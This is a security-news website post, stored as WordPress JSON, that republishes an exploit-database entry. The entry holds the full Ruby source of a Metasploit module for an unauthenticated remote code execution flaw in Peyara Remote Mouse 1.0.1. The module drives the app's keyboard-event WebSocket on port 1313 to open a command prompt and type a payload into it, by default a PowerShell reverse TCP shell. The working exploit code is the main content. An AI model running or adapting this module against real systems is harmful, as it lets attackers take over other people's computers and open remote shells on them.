{"id":66315,"date":"2026-06-26T15:45:36","date_gmt":"2026-06-26T15:45:36","guid":{"rendered":"https:\/\/zero.redgem.net\/?p=66315"},"modified":"2026-06-26T15:45:36","modified_gmt":"2026-06-26T15:45:36","slug":"peyara-remote-mouse-101-unauthenticated-remote-code-execution","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=66315","title":{"rendered":"Peyara Remote Mouse 1.0.1 Unauthenticated Remote Code Execution_MSF:EXPLOIT-WINDOWS-MISC-PEYARA_REMOTE_MOUSE_RCE-"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-06-26T19:36:58&#8243;,&#8221;description&#8221;:&#8221;This module exploits an unauthenticated remote code execution vulnerability in Peyara Remote Mouse 1.0.1. The application exposes a Socket.IO WebSocket service on TCP port 1313 and accepts unauthenticated keyboard input events. The module sends&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-06-26T19:05:41&#8243;,&#8221;modified&#8221;:&#8221;2026-06-26T19:05:41&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;Peyara Remote Mouse 1.0.1 Unauthenticated Remote Code Execution&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;MSF:EXPLOIT-WINDOWS-MISC-PEYARA_REMOTE_MOUSE_RCE-&#8220;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;# frozen_string_literal: true\\n\\n##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Remote\\n  Rank = ExcellentRanking\\n\\n  include Msf::Exploit::Remote::HttpClient\\n  include Rex::Proto::Http::WebSocket\\n  prepend Msf::Exploit::Remote::AutoCheck\\n\\n  # Engine.IO \/ Socket.IO packet types exchanged as plain WebSocket text frames.\\n  # See: https:\/\/socket.io\/docs\/v4\/engine-io-protocol\/ and\\n  #      https:\/\/socket.io\/docs\/v4\/socket-io-protocol\/\\n  ENGINEIO_OPEN = &#8216;0&#8217;         # Engine.IO OPEN (handshake) packet\\n  ENGINEIO_CLOSE = &#8216;1&#8217;        # Engine.IO CLOSE packet\\n  ENGINEIO_PING = &#8216;2&#8217;         # Engine.IO PING packet\\n  ENGINEIO_PONG = &#8216;3&#8217;         # Engine.IO PONG packet\\n  SOCKETIO_CONNECT = &#8217;40&#8217;     # Engine.IO MESSAGE (4) + Socket.IO CONNECT (0)\\n  SOCKETIO_EVENT = &#8217;42&#8217;       # Engine.IO MESSAGE (4) + Socket.IO EVENT (2)\\n\\n  # Fixed delay (seconds) after launching the command prompt, giving the\\n  # window time to appear before keystrokes are typed into it.\\n  WINDOW_DELAY = 1.0\\n\\n  # Peyara serves a single Engine.IO session at a time and keeps a dropped one\\n  # alive until its ping timeout, so a fresh connection can briefly fail to get\\n  # the OPEN frame. Retry the connect until the previous session is released.\\n  CONNECT_RETRIES = 10\\n  CONNECT_RETRY_DELAY = 3\\n\\n  def initialize(info = {})\\n    super(\\n      update_info(\\n        info,\\n        &#8216;Name&#8217; =\\u003e &#8216;Peyara Remote Mouse 1.0.1 Unauthenticated Remote Code Execution&#8217;,\\n        &#8216;Description&#8217; =\\u003e %q{\\n          This module exploits an unauthenticated remote code execution vulnerability\\n          in Peyara Remote Mouse 1.0.1. The application exposes a Socket.IO\\n          WebSocket service on TCP port 1313 and accepts unauthenticated keyboard\\n          input events.\\n\\n          The module sends keyboard events to open the Windows command prompt and\\n          type a Metasploit command payload, allowing arbitrary command execution\\n          in the context of the user running Peyara Remote Mouse.\\n        },\\n        &#8216;License&#8217; =\\u003e MSF_LICENSE,\\n        &#8216;Author&#8217; =\\u003e [\\n          &#8216;tmrswrr&#8217; # Vulnerability discovery, original PoC, and Metasploit module\\n        ],\\n        &#8216;References&#8217; =\\u003e [\\n          [&#8216;URL&#8217;, &#8216;https:\/\/github.com\/capture0x\/Peyara&#8217;],\\n          [&#8216;URL&#8217;, &#8216;https:\/\/peyara-remote-mouse.vercel.app\/&#8217;]\\n        ],\\n        &#8216;DisclosureDate&#8217; =\\u003e &#8216;2025-05-30&#8217;,\\n        &#8216;Platform&#8217; =\\u003e &#8216;win&#8217;,\\n        &#8216;Arch&#8217; =\\u003e ARCH_CMD,\\n        &#8216;Privileged&#8217; =\\u003e false,\\n        &#8216;Targets&#8217; =\\u003e [\\n          [\\n            &#8216;Windows Command&#8217;,\\n            {\\n              &#8216;Platform&#8217; =\\u003e &#8216;win&#8217;,\\n              &#8216;Arch&#8217; =\\u003e ARCH_CMD\\n            }\\n          ]\\n        ],\\n        &#8216;DefaultTarget&#8217; =\\u003e 0,\\n        &#8216;DefaultOptions&#8217; =\\u003e {\\n          &#8216;RPORT&#8217; =\\u003e 1313,\\n          &#8216;PAYLOAD&#8217; =\\u003e &#8216;cmd\/windows\/powershell_reverse_tcp&#8217;,\\n          &#8216;WfsDelay&#8217; =\\u003e 10\\n        },\\n        &#8216;Notes&#8217; =\\u003e {\\n          &#8216;Stability&#8217; =\\u003e [CRASH_SAFE],\\n          &#8216;Reliability&#8217; =\\u003e [REPEATABLE_SESSION],\\n          &#8216;SideEffects&#8217; =\\u003e [SCREEN_EFFECTS, IOC_IN_LOGS]\\n        }\\n      )\\n    )\\n\\n    register_options(\\n      [\\n        OptString.new(&#8216;TARGETURI&#8217;, [true, &#8216;Base path for the Socket.IO endpoint&#8217;, &#8216;\/&#8217;]),\\n        OptFloat.new(&#8216;KEY_DELAY&#8217;, [true, &#8216;Delay between keyboard events in seconds&#8217;, 0.06]),\\n        OptInt.new(&#8216;WS_TIMEOUT&#8217;, [true, &#8216;Timeout for WebSocket operations in seconds&#8217;, 5])\\n      ]\\n    )\\n  end\\n\\n  def recv_wstext(wsock)\\n    frame = nil\\n\\n    begin\\n      # TODO: R7 engineers may want a pattern that avoids the Timeout API here.\\n      ::Timeout.timeout(datastore[&#8216;WS_TIMEOUT&#8217;]) do\\n        frame = wsock.get_wsframe\\n      end\\n    rescue ::Timeout::Error\\n      return nil\\n    end\\n\\n    return nil unless frame\\n\\n    frame.unmask! if frame.header.masked == 1\\n    frame.payload_data.to_s\\n  end\\n\\n  # Performs the Socket.IO namespace connect handshake on an open WebSocket and\\n  # returns true once the server acknowledges with a CONNECT packet.\\n  def socketio_connect(wsock)\\n    wsock.put_wstext(SOCKETIO_CONNECT)\\n\\n    3.times do\\n      frame = recv_wstext(wsock)\\n      next if frame.nil?\\n\\n      wsock.put_wstext(ENGINEIO_PONG) if frame == ENGINEIO_PING\\n      return true if frame.start_with?(SOCKETIO_CONNECT)\\n    end\\n\\n    false\\n  end\\n\\n  # Close the Engine.IO session before dropping the socket. Without the explicit\\n  # CLOSE packet the server keeps the session alive until its ping timeout, which\\n  # blocks the next connection (for example check() followed by exploit()).\\n  def close_session(wsock)\\n    return unless wsock\\n\\n    begin\\n      wsock.put_wstext(ENGINEIO_CLOSE)\\n    rescue StandardError\\n      nil\\n    ensure\\n      wsock.wsclose\\n    end\\n  end\\n\\n  def send_event(wsock, event, data)\\n    wsock.put_wstext(\\&#8221;#{SOCKETIO_EVENT}#{JSON.generate([event, data])}\\&#8221;)\\n    Rex.sleep(datastore[&#8216;KEY_DELAY&#8217;])\\n  end\\n\\n  def press_key(wsock, key)\\n    send_event(wsock, &#8216;key&#8217;, key)\\n  end\\n\\n  def open_command_prompt(wsock)\\n    send_event(wsock, &#8216;edit-key&#8217;, { &#8216;key&#8217; =\\u003e &#8216;escape&#8217;, &#8216;modifier&#8217; =\\u003e [&#8216;control&#8217;] })\\n    Rex.sleep(0.5)\\n\\n    %w[c m d enter].each do |key|\\n      press_key(wsock, key)\\n    end\\n\\n    Rex.sleep(WINDOW_DELAY)\\n    press_key(wsock, &#8216;enter&#8217;)\\n    Rex.sleep(0.5)\\n  end\\n\\n  # Open a fresh Engine.IO session and return the socket once the server sends\\n  # the OPEN frame, retrying while a previous (still lingering) session blocks it.\\n  def open_socketio_session\\n    CONNECT_RETRIES.times do |attempt|\\n      # connect_ws issues the upgrade through send_request_raw, which does not\\n      # render vars_get, so the Engine.IO query has to live in the request URI.\\n      wsock = connect_ws(&#8216;uri&#8217; =\\u003e \\&#8221;#{normalize_uri(target_uri.path, &#8216;socket.io\/&#8217;)}?EIO=4\\u0026transport=websocket\\&#8221;)\\n      return wsock if recv_wstext(wsock)\\u0026.start_with?(ENGINEIO_OPEN)\\n\\n      close_session(wsock)\\n      Rex.sleep(CONNECT_RETRY_DELAY) unless attempt == CONNECT_RETRIES &#8211; 1\\n    end\\n\\n    nil\\n  end\\n\\n  def check\\n    wsock = open_socketio_session\\n\\n    return CheckCode::Safe(&#8216;The service did not return the expected Socket.IO open frame&#8217;) unless wsock\\n\\n    # An Engine.IO open frame alone is common to any Socket.IO service, so also\\n    # require a successful Socket.IO namespace connect to reduce false positives.\\n    return CheckCode::Appears(&#8216;The service completed a Socket.IO namespace connect handshake&#8217;) if socketio_connect(wsock)\\n\\n    CheckCode::Detected(&#8216;An Engine.IO service is present but did not complete the Socket.IO connect handshake&#8217;)\\n  rescue Rex::Proto::Http::WebSocket::ConnectionError =\\u003e e\\n    CheckCode::Unknown(\\&#8221;WebSocket connection failed: #{e.message}\\&#8221;)\\n  ensure\\n    close_session(wsock)\\n  end\\n\\n  def exploit\\n    print_status(&#8216;Connecting to the Socket.IO WebSocket endpoint&#8217;)\\n    wsock = open_socketio_session\\n    fail_with(Failure::Unreachable, &#8216;The service did not return the expected Socket.IO open frame&#8217;) unless wsock\\n\\n    fail_with(Failure::UnexpectedReply, &#8216;The Socket.IO namespace connect was not acknowledged&#8217;) unless socketio_connect(wsock)\\n\\n    print_status(&#8216;Opening command prompt through remote keyboard events&#8217;)\\n    open_command_prompt(wsock)\\n\\n    command = payload.encoded\\n    print_status(\\&#8221;Sending payload command (#{command.length} bytes)\\&#8221;)\\n\\n    # Type the command one character at a time. Batching characters into a single\\n    # \\&#8221;key\\&#8221; event makes the target collapse repeated keys (e.g. \\&#8221;ll\\&#8221;, \\&#8221;dd\\&#8221;) and\\n    # garble bursts; one event per character (space included, as a literal \\&#8221; \\&#8221;)\\n    # is what types the payload reliably.\\n    command.each_char { |ch| press_key(wsock, ch) }\\n\\n    Rex.sleep(WINDOW_DELAY)\\n    press_key(wsock, &#8216;enter&#8217;)\\n\\n    handler\\n  rescue Rex::Proto::Http::WebSocket::ConnectionError =\\u003e e\\n    fail_with(Failure::Unreachable, \\&#8221;WebSocket connection failed: #{e.message}\\&#8221;)\\n  ensure\\n    close_session(wsock)\\n  end\\nend\\n&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/windows\/misc\/peyara_remote_mouse_rce.rb&#8221;,&#8221;cvss&#8221;:{&#8220;score&#8221;:0,&#8221;severity&#8221;:&#8221;NONE&#8221;,&#8221;vector&#8221;:&#8221;NONE&#8221;,&#8221;version&#8221;:&#8221;NONE&#8221;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/www.rapid7.com\/db\/modules\/exploit\/windows\/misc\/peyara_remote_mouse_rce\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-06-26T19:36:58&#8243;,&#8221;description&#8221;:&#8221;This module exploits an unauthenticated remote code execution vulnerability in Peyara Remote Mouse 1.0.1. The application exposes a Socket.IO WebSocket service on TCP port 1313&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,169,13,33,7,11,5],"class_list":["post-66315","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-metasploit","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Peyara Remote Mouse 1.0.1 Unauthenticated Remote Code Execution_MSF:EXPLOIT-WINDOWS-MISC-PEYARA_REMOTE_MOUSE_RCE- zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=66315\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Peyara Remote Mouse 1.0.1 Unauthenticated Remote Code Execution_MSF:EXPLOIT-WINDOWS-MISC-PEYARA_REMOTE_MOUSE_RCE- zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-06-26T19:36:58&#8243;,&#8221;description&#8221;:&#8221;This module exploits an unauthenticated remote code execution vulnerability in Peyara Remote Mouse 1.0.1. The application exposes a Socket.IO WebSocket service on TCP port 1313...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=66315\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-06-26T15:45:36+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"7 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=66315#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=66315\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Peyara Remote Mouse 1.0.1 Unauthenticated Remote Code Execution_MSF:EXPLOIT-WINDOWS-MISC-PEYARA_REMOTE_MOUSE_RCE-\",\"datePublished\":\"2026-06-26T15:45:36+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=66315\"},\"wordCount\":1400,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"metasploit\",\"news\",\"NONE\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=66315#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=66315\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=66315\",\"name\":\"Peyara Remote Mouse 1.0.1 Unauthenticated Remote Code Execution_MSF:EXPLOIT-WINDOWS-MISC-PEYARA_REMOTE_MOUSE_RCE- zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-06-26T15:45:36+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=66315#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=66315\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=66315#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Peyara Remote Mouse 1.0.1 Unauthenticated Remote Code Execution_MSF:EXPLOIT-WINDOWS-MISC-PEYARA_REMOTE_MOUSE_RCE-\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Peyara Remote Mouse 1.0.1 Unauthenticated Remote Code Execution_MSF:EXPLOIT-WINDOWS-MISC-PEYARA_REMOTE_MOUSE_RCE- zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=66315","og_locale":"en_US","og_type":"article","og_title":"Peyara Remote Mouse 1.0.1 Unauthenticated Remote Code Execution_MSF:EXPLOIT-WINDOWS-MISC-PEYARA_REMOTE_MOUSE_RCE- zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-06-26T19:36:58&#8243;,&#8221;description&#8221;:&#8221;This module exploits an unauthenticated remote code execution vulnerability in Peyara Remote Mouse 1.0.1. The application exposes a Socket.IO WebSocket service on TCP port 1313...","og_url":"https:\/\/zero.redgem.net\/?p=66315","og_site_name":"zero redgem","article_published_time":"2026-06-26T15:45:36+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"7 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=66315#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=66315"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Peyara Remote Mouse 1.0.1 Unauthenticated Remote Code Execution_MSF:EXPLOIT-WINDOWS-MISC-PEYARA_REMOTE_MOUSE_RCE-","datePublished":"2026-06-26T15:45:36+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=66315"},"wordCount":1400,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","metasploit","news","NONE","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=66315#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=66315","url":"https:\/\/zero.redgem.net\/?p=66315","name":"Peyara Remote Mouse 1.0.1 Unauthenticated Remote Code Execution_MSF:EXPLOIT-WINDOWS-MISC-PEYARA_REMOTE_MOUSE_RCE- zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-06-26T15:45:36+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=66315#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=66315"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=66315#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Peyara Remote Mouse 1.0.1 Unauthenticated Remote Code Execution_MSF:EXPLOIT-WINDOWS-MISC-PEYARA_REMOTE_MOUSE_RCE-"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/66315","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=66315"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/66315\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=66315"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=66315"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=66315"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}